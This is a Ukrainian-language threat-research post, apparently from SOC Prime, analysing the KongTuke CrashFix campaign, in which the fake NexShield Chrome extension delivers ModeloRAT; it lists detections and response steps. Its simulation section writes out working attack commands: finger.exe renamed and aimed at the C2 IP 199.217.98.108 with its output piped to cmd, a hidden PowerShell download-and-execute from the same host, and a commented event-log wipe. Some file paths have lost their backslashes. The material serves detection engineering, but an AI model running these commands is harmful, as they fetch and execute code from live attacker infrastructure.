SOC Prime Bias: Критичний

21 Jan 2026 16:34 UTC

Розбір CrashFix: Нова іграшка від KongTuke

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Розбір CrashFix: Нова іграшка від KongTuke
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

KongTuke розповсюджував шкідливе розширення Chrome, NexShield, яке імітує uBlock Origin Lite. Після встановлення воно відображає попередження безпеки “CrashFix”, щоб змоделювати справжній інцидент безпеки браузера, викликає збій браузера і змушує користувача виконати шкідливу команду PowerShell, скопійовану в буфер обміну. Кампанія розгортає Python RAT, ModeloRAT, на системах, підключених до домену, і кількаетапну ланцюжок PowerShell на автономних хостах.

Розслідування

Аналітики Huntress переглянули код розширення, пов’язали командно-контрольний центр з nexsnield.com і зворотно зняли завантажені корисні навантаження. Вони спостерігали зловживання finger.exe як LOLBin для отримання інструкцій від зловмисника, а також DGA, який генерує домени .top. У середовищах на домені дослідники ідентифікували зашифрований за допомогою RC4 Python-імплантат, що зберігається через ключ HKCU Run. Додаткові методи включали обійти AMSI, і тактики виснаження ресурсів, призначені для тиску на користувачів з метою швидкого повного дотримання.

Захист

Блокуйте ID розширення Chrome і стежте за невідомими розширеннями, які видають себе за популярні блокувальники реклами. Виявляйте підключення до nexsnield.com, IP-адрес C2 і доменів, створених DGA. Використовуйте контроль виконання для обмеження використання LOLBin (включаючи finger.exe) і попереджайте про підозрілі значення ключів Run, особливо ті, що схожі на широко використовуване програмне забезпечення.

Відповідь

Попереджайте про встановлення розширень, пов’язаних з NexShield, і співвідносіть із зовнішніми з’єднаннями до виявленої інфраструктури C2 і DGA. Ізолюйте уражені хости та збирайте артефакти розширення, ключі реєстру Run, заплановані завдання та вилучені файли. Видаліть персистентність ModeloRAT, знищіть компоненти PowerShell-етапу, та відновіть і перевірте кінцеву точку.

Потік Атаки

Детекції

Виклик підозрілих методів .NET із Powershell (через powershell)

Команда SOC Prime
21 січня 2026

Підозріле використання CURL (через cmdline)

Команда SOC Prime
21 січня 2026

Коротка назва файлу (через cmdline)

Команда SOC Prime
21 січня 2026

Можливе ручне або сценарійоване виконання в незвичайних папках (через cmdline)

Команда SOC Prime
21 січня 2026

Підозрілі рядки Powershell (через powershell)

Команда SOC Prime
21 січня 2026

Виклик підозрілих функцій Windows API з Powershell (через powershell)

Команда SOC Prime
21 січня 2026

Можливі точки постійності [ASEPs – Software/NTUSER Hive] (через registry_event)

Команда SOC Prime
21 січня 2026

Архів був розпакований у підозрілу директорію за допомогою Powershell (через powershell)

Команда SOC Prime
21 січня 2026

Виконання Python з підозрілих папок (через cmdline)

Команда SOC Prime
21 січня 2026

Можливі індикатори обфускації Powershell (через powershell)

Команда SOC Prime
21 січня 2026

Можливе системне перерахування (через cmdline)

Команда SOC Prime
21 січня 2026

Завантаження або вивантаження через Powershell (через cmdline)

Команда SOC Prime
21 січня 2026

IOCs (SourceIP) для виявлення: Аналіз CrashFix: Нова іграшка KongTuke

Правила AI SOC Prime
21 січня 2026

IOCs (HashSha256) для виявлення: Аналіз CrashFix: Нова іграшка KongTuke

Правила AI SOC Prime
21 січня 2026

IOCs (DestinationIP) для виявлення: Аналіз CrashFix: Нова іграшка KongTuke

Правила AI SOC Prime
21 січня 2026

IOCs (Emails) для виявлення: Аналіз CrashFix: Нова іграшка KongTuke

Правила AI SOC Prime
21 січня 2026

Виявлення виконання шкідливих команд KongTuke CrashFix [Windows Process Creation]

Правила AI SOC Prime
21 січня 2026

Виявлення обходу AMSI та видалення слідів за допомогою PowerShell [Windows Powershell]

Правила AI SOC Prime
21 січня 2026

Виконання симуляції

Передумови: Телеметрія та перевірка бази повинні пройти.

Обґрунтування: У цьому розділі детально описується точне виконання техніки противника (TTP), призначене для спрацьовування правила виявлення. Команди та опис ОБОВ’ЯЗКОВО повинні прямо відображати певні TTP та мають на меті створення саме тієї телеметрії, яку очікує логіка виявлення.

  • Розповідь про атаку та команди:
    Зловмисник спочатку копіює легітимний finger.exe бінарний файл у тимчасову папку, перейменовуючи його на ct.exe, а потім використовує вкладений cmd /c ланцюг, щоб викликати скопійований бінарний файл із підробленим аргументом, що контактує з віддаленим C2-сервером (199.217.98.108). Бінарний файл передає корисне навантаження назад у командний рядок, яке потім передається в другий прихований cmd що виконує отриманий код. Після цього зловмисник використовує PowerShell для завантаження вторинного корисного навантаження за допомогою Invoke‑WebRequest і негайно виконує це за допомогою iex. Усі кроки виконуються з мінімальним UI (/min) щоб уникнути виявлення користувачем.

     1. Копіювати finger.exe → %TEMP%ct.exe
      2. Запустити: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"
      3. Завантаження PowerShell і виконання вторинного корисного навантаження:
         powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content"
  • Скрипт регресійного тесту: Нижченаведений скрипт відтворює повний ланцюжок атаки на тестовій машині Windows. Виконайте його в підвищеній Powershell сесії.

    #-------------------------------------------------
    # Виконання шкідливих команд KongTuke CrashFix
    #-------------------------------------------------
    # 1. Розгорніть LOLBin (finger.exe) у %TEMP% як ct.exe
    $fingerPath = "$env:windirsystem32finger.exe"
    $tempExe    = "$env:TEMPct.exe"
    Copy-Item -Path $fingerPath -Destination $tempExe -Force
    
    # 2. Виконання шкідливого cmd-ланцюга (відповідає правилу Sigma)
    $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"'
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden
    
    # 3. Завантаження та виконання вторинного корисного навантаження через PowerShell
    $payloadUrl = 'http://199.217.98.108/payload.ps1'
    $psCommand  = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content"
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden
    #-------------------------------------------------
  • Команди очищення: Віджаліть залишки і зупиніть усі процеси, що залишилися після тесту.

    # Видалити скопійований ct.exe
    Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue
    
    # Завершити будь-які зайві процеси cmd.exe або powershell.exe, започатковані тестом (фільтрація за конкретною командною лінією)
    Get-WmiObject Win32_Process |
        Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } |
        ForEach-Object { $_.Terminate() }
    
    # За бажанням: очистити Журнал подій, якщо це потрібно для повторюваності
    # wevlutil cl Security